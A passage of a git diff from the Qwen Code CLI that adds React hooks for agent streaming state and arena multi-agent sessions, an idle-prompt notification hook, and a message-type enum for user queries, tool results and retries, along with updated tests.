} from 'react'; +import { + AgentStatus, + AgentEventType, + isTerminalStatus, + type AgentInteractive, + type AgentEventEmitter, +} from '@qwen-code/qwen-code-core'; +import { StreamingState } from '../types.js'; +import { useTimer } from './useTimer.js'; + +// ─── Types ────────────────────────────────────────────────── + +export interface AgentStreamingInfo { + /** The agent's current lifecycle status. */ + status: AgentStatus | undefined; + /** Derived streaming state for StreamingContext / LoadingIndicator. */ + streamingState: StreamingState; + /** Whether the agent can accept user input right now. */ + isInputActive: boolean; + /** Seconds elapsed while in Responding state (resets each cycle). */ + elapsedTime: number; + /** Prompt token count from the most recent round (for context usage). */ + lastPromptTokenCount: number; +} + +// ─── Hook ─────────────────────────────────────────────────── + +/** + * Subscribe to an AgentInteractive's events and derive UI streaming state. + * + * @param interactiveAgent - The agent instance, or undefined if not yet registered. + * @param events - Which event types trigger a re-render. Defaults to + * STATUS_CHANGE, TOOL_WAITING_APPROVAL, and TOOL_RESULT — sufficient for + * composer / footer use. Callers like AgentChatView can pass a broader set + * (e.g. include TOOL_CALL, ROUND_END, TOOL_OUTPUT_UPDATE) for richer updates. + */ +export function useAgentStreamingState( + interactiveAgent: AgentInteractive | undefined, + events?: ReadonlyArray<(typeof AgentEventType)[keyof typeof AgentEventType]>, +): AgentStreamingInfo { + // ── Force-render on agent events ── + + const [, setTick] = useState(0); + const tickRef = useRef(0); + const forceRender = useCallback(() => { + tickRef.current += 1; + setTick(tickRef.current); + }, []); + + // ── Track last prompt token count from USAGE_METADATA events ── + + const [lastPromptTokenCount, setLastPromptTokenCount] = useState( + () => interactiveAgent?.getLastPromptTokenCount() ?? 0, + ); + + const subscribedEvents = events ?? DEFAULT_EVENTS; + + useEffect(() => { + if (!interactiveAgent) return; + const emitter: AgentEventEmitter | undefined = + interactiveAgent.getEventEmitter(); + if (!emitter) return; + + const handler = () => forceRender(); + for (const evt of subscribedEvents) { + emitter.on(evt, handler); + } + + // Dedicated listener for usage metadata — updates React state directly + // so the token count is available immediately (even if no other event + // triggers a re-render). Prefers totalTokenCount (prompt + output) + // because output becomes history for the next round, matching + // geminiChat.ts. + const usageHandler = (event: { + usage?: { totalTokenCount?: number; promptTokenCount?: number }; + }) => { + const count = + event?.usage?.totalTokenCount ?? event?.usage?.promptTokenCount; + if (typeof count === 'number' && count > 0) { + setLastPromptTokenCount(count); + } + }; + emitter.on(AgentEventType.USAGE_METADATA, usageHandler); + + return () => { + for (const evt of subscribedEvents) { + emitter.off(evt, handler); + } + emitter.off(AgentEventType.USAGE_METADATA, usageHandler); + }; + }, [interactiveAgent, forceRender, subscribedEvents]); + + // ── Derived state ── + + const status = interactiveAgent?.getStatus(); + const pendingApprovals = interactiveAgent?.getPendingApprovals(); + const hasPendingApprovals = + pendingApprovals !== undefined && pendingApprovals.size > 0; + + const streamingState = useMemo(() => { + if (hasPendingApprovals) { + return StreamingState.WaitingForConfirmation; + } + if (status === AgentStatus.RUNNING || status === AgentStatus.INITIALIZING) { + return StreamingState.Responding; + } + return StreamingState.Idle; + }, [status, hasPendingApprovals]); + + const isInputActive = + (streamingState === StreamingState.Idle || + streamingState === StreamingState.Responding) && + status !== undefined && + !isTerminalStatus(status); + + // ── Timer (resets each time we enter Responding) ── + + const [timerResetKey, setTimerResetKey] = useState(0); + const prevStreamingRef = useRef(streamingState); + useEffect(() => { + if ( + streamingState === StreamingState.Responding && + prevStreamingRef.current !== StreamingState.Responding + ) { + setTimerResetKey((k) => k + 1); + } + prevStreamingRef.current = streamingState; + }, [streamingState]); + + const elapsedTime = useTimer( + streamingState === StreamingState.Responding, + timerResetKey, + ); + + return { + status, + streamingState, + isInputActive, + elapsedTime, + lastPromptTokenCount, + }; +} + +// ─── Defaults ─────────────────────────────────────────────── + +const DEFAULT_EVENTS = [ + AgentEventType.STATUS_CHANGE, + AgentEventType.TOOL_WAITING_APPROVAL, + AgentEventType.TOOL_RESULT, +] as const; diff --git a/packages/cli/src/ui/hooks/useArenaCommand.ts b/packages/cli/src/ui/hooks/useArenaCommand.ts new file mode 100644 index 000000000..0392a0f1f --- /dev/null +++ b/packages/cli/src/ui/hooks/useArenaCommand.ts @@ -0,0 +1,37 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { useCallback, useState } from 'react'; + +export type ArenaDialogType = 'start' | 'select' | 'stop' | 'status' | null; + +interface UseArenaCommandReturn { + activeArenaDialog: ArenaDialogType; + openArenaDialog: (type: Exclude) => void; + closeArenaDialog: () => void; +} + +export function useArenaCommand(): UseArenaCommandReturn { + const [activeArenaDialog, setActiveArenaDialog] = + useState(null); + + const openArenaDialog = useCallback( + (type: Exclude) => { + setActiveArenaDialog(type); + }, + [], + ); + + const closeArenaDialog = useCallback(() => { + setActiveArenaDialog(null); + }, []); + + return { + activeArenaDialog, + openArenaDialog, + closeArenaDialog, + }; +} diff --git a/packages/cli/src/ui/hooks/useArenaInProcess.ts b/packages/cli/src/ui/hooks/useArenaInProcess.ts new file mode 100644 index 000000000..c75634a2a --- /dev/null +++ b/packages/cli/src/ui/hooks/useArenaInProcess.ts @@ -0,0 +1,177 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview useArenaInProcess — bridges ArenaManager in-process events + * to AgentViewContext agent registration. + * + * Subscribes to `config.onArenaManagerChange()` to react immediately when + * the arena manager is set or cleared. Event listeners are attached to the + * manager's emitter as soon as it appears — the backend is resolved lazily + * inside the AGENT_START handler, which only fires after the backend is + * initialized. + */ + +import { useEffect, useRef } from 'react'; +import { + ArenaEventType, + ArenaSessionStatus, + DISPLAY_MODE, + type ArenaAgentStartEvent, + type ArenaManager, + type ArenaSessionCompleteEvent, + type Config, + type InProcessBackend, +} from '@qwen-code/qwen-code-core'; +import type { AgentViewActions } from '../contexts/AgentViewContext.js'; +import { theme } from '../semantic-colors.js'; + +const AGENT_COLORS = [ + theme.text.accent, + theme.text.link, + theme.status.success, + theme.status.warning, + theme.text.code, + theme.status.error, +]; + +/** + * Bridge arena in-process events to agent tab registration/unregistration. + * + * Called by AgentViewProvider — accepts config and actions directly so the + * hook has no dependency on AgentViewContext (avoiding a circular import). + */ +export function useArenaInProcess( + config: Config | null, + actions: AgentViewActions, +): void { + const actionsRef = useRef(actions); + actionsRef.current = actions; + + useEffect(() => { + if (!config) return; + + let detachArenaListeners: (() => void) | null = null; + const retryTimeouts = new Set>(); + + /** Remove agent tabs, cancel pending retries, and detach arena events. */ + const detachSession = () => { + actionsRef.current.unregisterAll(); + for (const t of retryTimeouts) clearTimeout(t); + retryTimeouts.clear(); + detachArenaListeners?.(); + detachArenaListeners = null; + }; + + /** Attach to an arena manager's event emitter. The backend is resolved + * lazily — we only need it when registering agents, not at subscribe + * time. This avoids the race where setArenaManager fires before + * manager.start() initializes the backend. */ + const attachSession = (manager: ArenaManager) => { + const emitter = manager.getEventEmitter(); + let colorIndex = 0; + + const nextColor = () => AGENT_COLORS[colorIndex++ % AGENT_COLORS.length]!; + + /** Resolve the InProcessBackend, or null if not applicable. */ + const getInProcessBackend = (): InProcessBackend | null => { + const backend = manager.getBackend(); + if (!backend || backend.type !== DISPLAY_MODE.IN_PROCESS) return null; + return backend as InProcessBackend; + }; + + // Register agents that already started (events may have fired before + // the callback was attached). + const inProcessBackend = getInProcessBackend(); + if (inProcessBackend) { + for (const agentState of manager.getAgentStates()) { + const interactive = inProcessBackend.getAgent(agentState.agentId); + if (interactive) { + actionsRef.current.registerAgent( + agentState.agentId, + interactive, + agentState.model.modelId, + nextColor(), + agentState.model.displayName, + ); + } + } + } + + // AGENT_START fires *before* backend.spawnAgent() creates the + // AgentInteractive, so getAgent() may return undefined. Retry briefly. + const MAX_RETRIES = 20; + const RETRY_MS = 50; + + const onAgentStart = (event: ArenaAgentStartEvent) => { + const tryRegister = (retriesLeft: number) => { + const backend = getInProcessBackend(); + if (!backend) return; // not an in-process session + + const interactive = backend.getAgent(event.agentId); + if (interactive) { + actionsRef.current.registerAgent( + event.agentId, + interactive, + event.model.modelId, + nextColor(), + event.model.displayName, + ); + return; + } + if (retriesLeft > 0) { + const timeout = setTimeout(() => { + retryTimeouts.delete(timeout); + tryRegister(retriesLeft - 1); + }, RETRY_MS); + retryTimeouts.add(timeout); + } + }; + tryRegister(MAX_RETRIES); + }; + + const onSessionComplete = (event: ArenaSessionCompleteEvent) => { + // IDLE means agents finished but the session is still alive for + // follow-up interaction — keep the tab bar. + if (event.result.status === ArenaSessionStatus.IDLE) return; + detachSession(); + }; + + const onSessionError = () => detachSession(); + + emitter.on(ArenaEventType.AGENT_START, onAgentStart); + emitter.on(ArenaEventType.SESSION_COMPLETE, onSessionComplete); + emitter.on(ArenaEventType.SESSION_ERROR, onSessionError); + + detachArenaListeners = () => { + emitter.off(ArenaEventType.AGENT_START, onAgentStart); + emitter.off(ArenaEventType.SESSION_COMPLETE, onSessionComplete); + emitter.off(ArenaEventType.SESSION_ERROR, onSessionError); + }; + }; + + const handleManagerChange = (manager: ArenaManager | null) => { + detachSession(); + if (manager) { + attachSession(manager); + } + }; + + // Subscribe to future changes. + config.onArenaManagerChange(handleManagerChange); + + // Handle the case where a manager already exists when we mount. + const current = config.getArenaManager(); + if (current) { + attachSession(current); + } + + return () => { + config.onArenaManagerChange(null); + detachSession(); + }; + }, [config]); +} diff --git a/packages/cli/src/ui/hooks/useAttentionNotifications.ts b/packages/cli/src/ui/hooks/useAttentionNotifications.ts index 7c5cd043a..39d547ee1 100644 --- a/packages/cli/src/ui/hooks/useAttentionNotifications.ts +++ b/packages/cli/src/ui/hooks/useAttentionNotifications.ts @@ -11,6 +11,11 @@ import { AttentionNotificationReason, } from '../../utils/attentionNotification.js'; import type { LoadedSettings } from '../../config/settings.js'; +import type { Config } from '@qwen-code/qwen-code-core'; +import { + fireNotificationHook, + NotificationType, +} from '@qwen-code/qwen-code-core'; export const LONG_TASK_NOTIFICATION_THRESHOLD_SECONDS = 20; @@ -19,6 +24,7 @@ interface UseAttentionNotificationsOptions { streamingState: StreamingState; elapsedTime: number; settings: LoadedSettings; + config?: Config; } export const useAttentionNotifications = ({ @@ -26,10 +32,12 @@ export const useAttentionNotifications = ({ streamingState, elapsedTime, settings, + config, }: UseAttentionNotificationsOptions) => { const terminalBellEnabled = settings?.merged?.general?.terminalBell ?? true; const awaitingNotificationSentRef = useRef(false); const respondingElapsedRef = useRef(0); + const idleNotificationSentRef = useRef(false); useEffect(() => { if ( @@ -51,6 +59,8 @@ export const useAttentionNotifications = ({ useEffect(() => { if (streamingState === StreamingState.Responding) { respondingElapsedRef.current = elapsedTime; + // Reset idle notification flag when responding + idleNotificationSentRef.current = false; return; } @@ -65,7 +75,28 @@ export const useAttentionNotifications = ({ } // Reset tracking for next task respondingElapsedRef.current = 0; + + // Fire idle_prompt notification hook when entering idle state + if (config && !idleNotificationSentRef.current) { + const messageBus = config.getMessageBus(); + const hooksEnabled = config.getEnableHooks(); + if (hooksEnabled && messageBus) { + fireNotificationHook( + messageBus, + 'Qwen Code is waiting for your input', + NotificationType.IdlePrompt, + 'Waiting for input', + ).catch(() => { + // Silently ignore errors - fireNotificationHook has internal error handling + // and notification hooks should not block the idle flow + }); + } + idleNotificationSentRef.current = true; + } return; } - }, [streamingState, elapsedTime, isFocused, terminalBellEnabled]); + + // Reset idle notification flag when in WaitingForConfirmation state + idleNotificationSentRef.current = false; + }, [streamingState, elapsedTime, isFocused, terminalBellEnabled, config]); }; diff --git a/packages/cli/src/ui/hooks/useAutoAcceptIndicator.ts b/packages/cli/src/ui/hooks/useAutoAcceptIndicator.ts index 3135a362b..3d075f8a6 100644 --- a/packages/cli/src/ui/hooks/useAutoAcceptIndicator.ts +++ b/packages/cli/src/ui/hooks/useAutoAcceptIndicator.ts @@ -19,6 +19,8 @@ export interface UseAutoAcceptIndicatorArgs { addItem?: (item: HistoryItemWithoutId, timestamp: number) => void; onApprovalModeChange?: (mode: ApprovalMode) => void; shouldBlockTab?: () => boolean; + /** When true, the keyboard handler is disabled (e.g. agent tab is active). */ + disabled?: boolean; } export function useAutoAcceptIndicator({ @@ -26,6 +28,7 @@ export function useAutoAcceptIndicator({ addItem, onApprovalModeChange, shouldBlockTab, + disabled, }: UseAutoAcceptIndicatorArgs): ApprovalMode { const currentConfigValue = config.getApprovalMode(); const [showAutoAcceptIndicator, setShowAutoAcceptIndicator] = @@ -78,7 +81,7 @@ export function useAutoAcceptIndicator({ } } }, - { isActive: true }, + { isActive: !disabled }, ); return showAutoAcceptIndicator; diff --git a/packages/cli/src/ui/hooks/useDialogClose.ts b/packages/cli/src/ui/hooks/useDialogClose.ts index d71a21190..119d1c96c 100644 --- a/packages/cli/src/ui/hooks/useDialogClose.ts +++ b/packages/cli/src/ui/hooks/useDialogClose.ts @@ -7,6 +7,7 @@ import { useCallback } from 'react'; import { SettingScope } from '../../config/settings.js'; import type { AuthType, ApprovalMode } from '@qwen-code/qwen-code-core'; +import type { ArenaDialogType } from './useArenaCommand.js'; // OpenAICredentials type (previously imported from OpenAIKeyPrompt) interface OpenAICredentials { apiKey: string; @@ -42,6 +43,10 @@ export interface DialogCloseOptions { isSettingsDialogOpen: boolean; closeSettingsDialog: () => void; + // Arena dialogs + activeArenaDialog: ArenaDialogType; + closeArenaDialog: () => void; + // Folder trust dialog isFolderTrustDialogOpen: boolean; @@ -83,6 +88,11 @@ export function useDialogClose(options: DialogCloseOptions) { return true; } + if (options.activeArenaDialog !== null) { + options.closeArenaDialog(); + return true; + } + if (options.isFolderTrustDialogOpen) { // FolderTrustDialog doesn't expose close function, but ESC would prevent exit // We follow the same pattern - prevent exit behavior diff --git a/packages/cli/src/ui/hooks/useGeminiStream.test.tsx b/packages/cli/src/ui/hooks/useGeminiStream.test.tsx index 49af6521e..2234db6bd 100644 --- a/packages/cli/src/ui/hooks/useGeminiStream.test.tsx +++ b/packages/cli/src/ui/hooks/useGeminiStream.test.tsx @@ -28,6 +28,7 @@ import { ApprovalMode, AuthType, GeminiEventType as ServerGeminiEventType, + SendMessageType, ToolErrorType, ToolConfirmationOutcome, } from '@qwen-code/qwen-code-core'; @@ -202,6 +203,7 @@ describe('useGeminiStream', () => { .fn() .mockReturnValue(contentGeneratorConfig), getMaxSessionTurns: vi.fn(() => 50), + getArenaAgentClient: vi.fn(() => null), } as unknown as Config; mockOnDebugMessage = vi.fn(); mockHandleSlashCommand = vi.fn().mockResolvedValue(false); @@ -482,7 +484,7 @@ describe('useGeminiStream', () => { expectedMergedResponse, expect.any(AbortSignal), 'prompt-id-2', - { isContinuation: true }, + { type: SendMessageType.ToolResult }, ); }); @@ -806,7 +808,7 @@ describe('useGeminiStream', () => { toolCallResponseParts, expect.any(AbortSignal), 'prompt-id-4', - { isContinuation: true }, + { type: SendMessageType.ToolResult }, ); }); @@ -1122,7 +1124,7 @@ describe('useGeminiStream', () => { 'This is the actual prompt from the command file.', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); expect(mockScheduleToolCalls).not.toHaveBeenCalled(); @@ -1149,7 +1151,7 @@ describe('useGeminiStream', () => { '', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); }); }); @@ -1168,7 +1170,7 @@ describe('useGeminiStream', () => { '// This is a line comment', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); }); }); @@ -1187,7 +1189,7 @@ describe('useGeminiStream', () => { '/* This is a block comment */', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); }); }); @@ -2091,7 +2093,7 @@ describe('useGeminiStream', () => { processedQueryParts, // Argument 1: The parts array directly expect.any(AbortSignal), // Argument 2: An AbortSignal expect.any(String), // Argument 3: The prompt_id string - undefined, // Argument 4: Options (undefined for normal prompts) + { type: SendMessageType.UserQuery }, // Argument 4: The options ); }); @@ -2879,7 +2881,7 @@ describe('useGeminiStream', () => { 'First query', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); // Verify only the first query was added to history @@ -2931,14 +2933,14 @@ describe('useGeminiStream', () => { 'First query', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); expect(mockSendMessageStream).toHaveBeenNthCalledWith( 2, 'Second query', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); }); @@ -2961,7 +2963,7 @@ describe('useGeminiStream', () => { 'Second query', expect.any(AbortSignal), expect.any(String), - undefined, + { type: SendMessageType.UserQuery }, ); }); }); diff --git a/packages/cli/src/ui/hooks/useGeminiStream.ts b/packages/cli/src/ui/hooks/useGeminiStream.ts index 1d4d736aa..5d39654b1 100644 --- a/packages/cli/src/ui/hooks/useGeminiStream.ts +++ b/packages/cli/src/ui/hooks/useGeminiStream.ts @@ -19,14 +19,17 @@ import type { } from '@qwen-code/qwen-code-core'; import { GeminiEventType as ServerGeminiEventType, + SendMessageType, createDebugLogger, getErrorMessage, isNodeError, MessageSenderType, logUserPrompt, + logUserRetry, GitService, UnauthorizedError, UserPromptEvent, + UserRetryEvent, logConversationFinishedEvent, ConversationFinishedEvent, ApprovalMode, @@ -431,6 +434,12 @@ export const useGeminiStream = ( isSubmittingQueryRef.current = false; abortControllerRef.current?.abort(); + // Report cancellation to arena status reporter (if in arena mode). + // This is needed because cancellation during tool execution won't + // flow through sendMessageStream where the inline reportCancelled() + // lives — tools get cancelled and handleCompletedTools returns early. + config.getArenaAgentClient()?.reportCancelled(); + // Log API cancellation const prompt_id = config.getSessionId() + '########' + getPromptCount(); const cancellationEvent = new ApiCancelEvent( @@ -1086,11 +1095,11 @@ export const useGeminiStream = ( const submitQuery = useCallback( async ( query: PartListUnion, - options?: { isContinuation: boolean; skipPreparation?: boolean }, + submitType: SendMessageType = SendMessageType.UserQuery, prompt_id?: string, ) => { const allowConcurrentBtwDuringResponse = - !options?.isContinuation && + submitType === SendMessageType.UserQuery && streamingState === StreamingState.Responding && typeof query === 'string' && isBtwCommand(query); @@ -1099,7 +1108,7 @@ export const useGeminiStream = ( // which are part of the same logical flow (tool responses) if ( isSubmittingQueryRef.current && - !options?.isContinuation && + submitType !== SendMessageType.ToolResult && !allowConcurrentBtwDuringResponse ) { return; @@ -1108,7 +1117,7 @@ export const useGeminiStream = ( if ( (streamingState === StreamingState.Responding || streamingState === StreamingState.WaitingForConfirmation) && - !options?.isContinuation && + submitType !== SendMessageType.ToolResult && !allowConcurrentBtwDuringResponse ) return; @@ -1119,7 +1128,10 @@ export const useGeminiStream = ( const userMessageTimestamp = Date.now(); // Reset quota error flag when starting a new query (not a continuation) - if (!options?.isContinuation && !allowConcurrentBtwDuringResponse) { + if ( + submitType !== SendMessageType.ToolResult && + !allowConcurrentBtwDuringResponse + ) { setModelSwitchedFromQuotaError(false); // Commit any pending retry error to history (without hint) since the // user is starting a new conversation turn. @@ -1148,14 +1160,15 @@ export const useGeminiStream = ( } return promptIdContext.run(prompt_id, async () => { - const { queryToSend, shouldProceed } = options?.skipPreparation - ? { queryToSend: query, shouldProceed: true } - : await prepareQueryForGemini( - query, - userMessageTimestamp, - abortSignal, - prompt_id!, - ); + const { queryToSend, shouldProceed } = + submitType === SendMessageType.Retry + ? { queryToSend: query, shouldProceed: true } + : await prepareQueryForGemini( + query, + userMessageTimestamp, + abortSignal, + prompt_id!, + ); if (!shouldProceed || queryToSend === null) { isSubmittingQueryRef.current = false; @@ -1163,7 +1176,7 @@ export const useGeminiStream = ( } // Check image format support for non-continuations - if (!options?.isContinuation) { + if (submitType === SendMessageType.UserQuery) { const formatCheck = checkImageFormatsSupport(queryToSend); if (formatCheck.hasUnsupportedFormats) { addItem( @@ -1180,7 +1193,7 @@ export const useGeminiStream = ( lastPromptRef.current = finalQueryToSend; lastPromptErroredRef.current = false; - if (!options?.isContinuation) { + if (submitType === SendMessageType.UserQuery) { // trigger new prompt event for session stats in CLI startNewPrompt(); @@ -1201,6 +1214,10 @@ export const useGeminiStream = ( setThought(null); } + if (submitType === SendMessageType.Retry) { + logUserRetry(config, new UserRetryEvent(prompt_id)); + } + setIsResponding(true); setInitError(null); @@ -1209,7 +1226,7 @@ export const useGeminiStream = ( finalQueryToSend, abortSignal, prompt_id!, - options, + { type: submitType }, ); const processingStatus = await processGeminiStreamEvents( @@ -1297,7 +1314,7 @@ export const useGeminiStream = ( * * When conditions are met: * - Clears any pending auto-retry countdown to avoid duplicate retries - * - Re-submits the last query with skipPreparation: true for faster retry + * - Re-submits the last query with isRetry: true, reusing the same prompt_id * * This function is exposed via UIActionsContext and triggered by InputPrompt * when the user presses Ctrl+Y (bound to Command.RETRY_LAST in keyBindings.ts). @@ -1324,10 +1341,7 @@ export const useGeminiStream = ( clearRetryCountdown(); - await submitQuery(lastPrompt, { - isContinuation: false, - skipPreparation: true, - }); + await submitQuery(lastPrompt, SendMessageType.Retry); }, [streamingState, addItem, clearRetryCountdown, submitQuery]); const handleApprovalModeChange = useCallback( @@ -1446,6 +1460,9 @@ export const useGeminiStream = ( role: 'user', parts: combinedParts, }); + + // Report cancellation to arena (safety net — cancelOngoingRequest + config.getArenaAgentClient()?.reportCancelled(); } const callIdsToMarkAsSubmitted = geminiTools.map( @@ -1473,13 +1490,7 @@ export const useGeminiStream = ( return; } - submitQuery( - responsesToSend, - { - isContinuation: true, - }, - prompt_ids[0], - ); + submitQuery(responsesToSend, SendMessageType.ToolResult, prompt_ids[0]); }, [ isResponding, @@ -1488,6 +1499,7 @@ export const useGeminiStream = ( geminiClient, performMemoryRefresh, modelSwitchedFromQuotaError, + config, ], ); diff --git a/packages/cli/src/ui/hooks/useInputHistory.ts b/packages/cli/src/ui/hooks/useInputHistory.ts index 58fc9d4a6..65e0256a5 100644 --- a/packages/cli/src/ui/hooks/useInputHistory.ts +++ b/packages/cli/src/ui/hooks/useInputHistory.ts @@ -18,6 +18,7 @@ export interface UseInputHistoryReturn { handleSubmit: (value: string) => void; navigateUp: () => boolean; navigateDown: () => boolean; + resetHistoryNav: () => void; } export function useInputHistory({ @@ -107,5 +108,6 @@ export function useInputHistory({ handleSubmit, navigateUp, navigateDown, + resetHistoryNav, }; } diff --git a/packages/cli/src/ui/hooks/useLoadingIndicator.test.ts b/packages/cli/src/ui/hooks/useLoadingIndicator.test.ts index 0845658ed..25e3bfe10 100644 --- a/packages/cli/src/ui/hooks/useLoadingIndicator.test.ts +++ b/packages/cli/src/ui/hooks/useLoadingIndicator.test.ts @@ -133,4 +133,119 @@ describe('useLoadingIndicator', () => { }); expect(result.current.elapsedTime).toBe(0); }); + + describe('token tracking', () => { + it('should capture token snapshot when task starts', () => { + const { result, rerender } = renderHook( + ({ streamingState, currentCandidatesTokens }) => + useLoadingIndicator( + streamingState, + undefined, + currentCandidatesTokens, + ), + { + initialProps: { + streamingState: StreamingState.Idle, + currentCandidatesTokens: 100, + }, + }, + ); + + expect(result.current.taskStartTokens).toBe(0); + + act(() => { + rerender({ + streamingState: StreamingState.Responding, + currentCandidatesTokens: 100, + }); + }); + + expect(result.current.taskStartTokens).toBe(100); + }); + + it('should reset token snapshot when transitioning from Responding to Idle', async () => { + const { result, rerender } = renderHook( + ({ streamingState, currentCandidatesTokens }) => + useLoadingIndicator( + streamingState, + undefined, + currentCandidatesTokens, + ), + { + initialProps: { + streamingState: StreamingState.Idle, + currentCandidatesTokens: 0, + }, + }, + ); + + act(() => { + rerender({ + streamingState: StreamingState.Responding, + currentCandidatesTokens: 0, + }); + }); + expect(result.current.taskStartTokens).toBe(0); + + await act(async () => { + await vi.advanceTimersByTimeAsync(1000); + rerender({ + streamingState: StreamingState.Responding, + currentCandidatesTokens: 500, + }); + }); + + act(() => { + rerender({ + streamingState: StreamingState.Idle, + currentCandidatesTokens: 500, + }); + }); + + expect(result.current.taskStartTokens).toBe(0); + }); + + it('should reset token snapshot when transitioning from WaitingForConfirmation to Responding', async () => { + const { result, rerender } = renderHook( + ({ streamingState, currentCandidatesTokens }) => + useLoadingIndicator( + streamingState, + undefined, + currentCandidatesTokens, + ), + { + initialProps: { + streamingState: StreamingState.Responding, + currentCandidatesTokens: 100, + }, + }, + ); + + expect(result.current.taskStartTokens).toBe(100); + + await act(async () => { + await vi.advanceTimersByTimeAsync(5000); + rerender({ + streamingState: StreamingState.Responding, + currentCandidatesTokens: 500, + }); + }); + + act(() => { + rerender({ + streamingState: StreamingState.WaitingForConfirmation, + currentCandidatesTokens: 500, + }); + }); + + act(() => { + rerender({ + streamingState: StreamingState.Responding, + currentCandidatesTokens: 500, + }); + }); + + expect(result.current.taskStartTokens).toBe(500); + }); + }); }); diff --git a/packages/cli/src/ui/hooks/useLoadingIndicator.ts b/packages/cli/src/ui/hooks/useLoadingIndicator.ts index d69df1706..63cab5711 100644 --- a/packages/cli/src/ui/hooks/useLoadingIndicator.ts +++ b/packages/cli/src/ui/hooks/useLoadingIndicator.ts @@ -7,11 +7,12 @@ import { StreamingState } from '../types.js'; import { useTimer } from './useTimer.js'; import { usePhraseCycler } from './usePhraseCycler.js'; -import { useState, useEffect, useRef } from 'react'; // Added useRef +import { useState, useEffect, useRef } from 'react'; export const useLoadingIndicator = ( streamingState: StreamingState, customWittyPhrases?: string[], + currentCandidatesTokens?: number, ) => { const [timerResetKey, setTimerResetKey] = useState(0); const isTimerActive = streamingState === StreamingState.Responding; @@ -27,6 +28,7 @@ export const useLoadingIndicator = ( ); const [retainedElapsedTime, setRetainedElapsedTime] = useState(0); + const [taskStartTokens, setTaskStartTokens] = useState(0); const prevStreamingStateRef = useRef(null); useEffect(() => { @@ -35,21 +37,26 @@ export const useLoadingIndicator = ( streamingState === StreamingState.Responding ) { setTimerResetKey((prevKey) => prevKey + 1); - setRetainedElapsedTime(0); // Clear retained time when going back to responding + setRetainedElapsedTime(0); + setTaskStartTokens(currentCandidatesTokens ?? 0); } else if ( streamingState === StreamingState.Idle && prevStreamingStateRef.current === StreamingState.Responding ) { - setTimerResetKey((prevKey) => prevKey + 1); // Reset timer when becoming idle from responding + setTimerResetKey((prevKey) => prevKey + 1); setRetainedElapsedTime(0); + setTaskStartTokens(0); + } else if ( + streamingState === StreamingState.Responding && + prevStreamingStateRef.current !== StreamingState.Responding + ) { + setTaskStartTokens(currentCandidatesTokens ?? 0); } else if (streamingState === StreamingState.WaitingForConfirmation) { - // Capture the time when entering WaitingForConfirmation - // elapsedTimeFromTimer will hold the last value from when isTimerActive was true. setRetainedElapsedTime(elapsedTimeFromTimer); } prevStreamingStateRef.current = streamingState; - }, [streamingState, elapsedTimeFromTimer]); + }, [streamingState, elapsedTimeFromTimer, currentCandidatesTokens]); return { elapsedTime: @@ -57,5 +64,6 @@ export const useLoadingIndicator = ( ? retainedElapsedTime : elapsedTimeFromTimer, currentLoadingPhrase, + taskStartTokens, }; }; diff --git a/packages/cli/src/ui/hooks/useReactToolScheduler.ts b/packages/cli/src/ui/hooks/useReactToolScheduler.ts index 56992f678..966c6adff 100644 --- a/packages/cli/src/ui/hooks/useReactToolScheduler.ts +++ b/packages/cli/src/ui/hooks/useReactToolScheduler.ts @@ -252,7 +252,6 @@ export function mapToDisplay( status: mapCoreStatusToDisplayStatus(trackedCall.status), resultDisplay: trackedCall.response.resultDisplay, confirmationDetails: undefined, - outputFile: trackedCall.response.outputFile, }; case 'error': return { diff --git a/packages/cli/src/ui/hooks/useResumeCommand.test.ts b/packages/cli/src/ui/hooks/useResumeCommand.test.ts index daaedfcce..ee144c4ec 100644 --- a/packages/cli/src/ui/hooks/useResumeCommand.test.ts +++ b/packages/cli/src/ui/hooks/useResumeCommand.test.ts @@ -142,6 +142,11 @@ describe('useResumeCommand', () => { getTargetDir: () => '/tmp', getGeminiClient: () => geminiClient, startNewSession: vi.fn(), + getDebugLogger: () => ({ + warn: vi.fn(), + debug: vi.fn(), + error: vi.fn(), + }), } as unknown as import('@qwen-code/qwen-code-core').Config; const { result } = renderHook(() => diff --git a/packages/cli/src/ui/hooks/useResumeCommand.ts b/packages/cli/src/ui/hooks/useResumeCommand.ts index 8fc3d4ddf..6a77ffdeb 100644 --- a/packages/cli/src/ui/hooks/useResumeCommand.ts +++ b/packages/cli/src/ui/hooks/useResumeCommand.ts @@ -5,7 +5,11 @@ */ import { useState, useCallback } from 'react'; -import { SessionService, type Config } from '@qwen-code/qwen-code-core'; +import { + SessionService, + type Config, + SessionStartSource, +} from '@qwen-code/qwen-code-core'; import { buildResumedHistoryItems } from '../utils/resumeHistoryUtils.js'; import type { UseHistoryManagerReturn } from './useHistoryManager.js'; @@ -67,6 +71,18 @@ export function useResumeCommand( config.startNewSession(sessionId, sessionData); await config.getGeminiClient()?.initialize?.(); + // Fire SessionStart event after resuming session + try { + await config + .getHookSystem() + ?.fireSessionStartEvent( + SessionStartSource.Resume, + config.getModel() ?? '', + ); + } catch (err) { + config.getDebugLogger().warn(`SessionStart hook failed: ${err}`); + } + // Refresh terminal UI. remount?.(); }, diff --git a/packages/cli/src/ui/hooks/useSelectionList.test.ts b/packages/cli/src/ui/hooks/useSelectionList.test.ts index 8383d89c9..e488fe175 100644 --- a/packages/cli/src/ui/hooks/useSelectionList.test.ts +++ b/packages/cli/src/ui/hooks/useSelectionList.test.ts @@ -5,6 +5,7 @@ */ import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import { useEffect, useState } from 'react'; import { renderHook, act } from '@testing-library/react'; import { useSelectionList, @@ -915,6 +916,37 @@ describe('useSelectionList', () => { expect(result.current.activeIndex).toBe(2); }); + + it('should handle equivalent items regenerated on each render', () => { + const { result } = renderHook(() => { + const [tick, setTick] = useState(0); + const regeneratedItems = [ + { value: 'A', key: 'A' }, + { value: 'B', disabled: true, key: 'B' }, + { value: 'C', key: 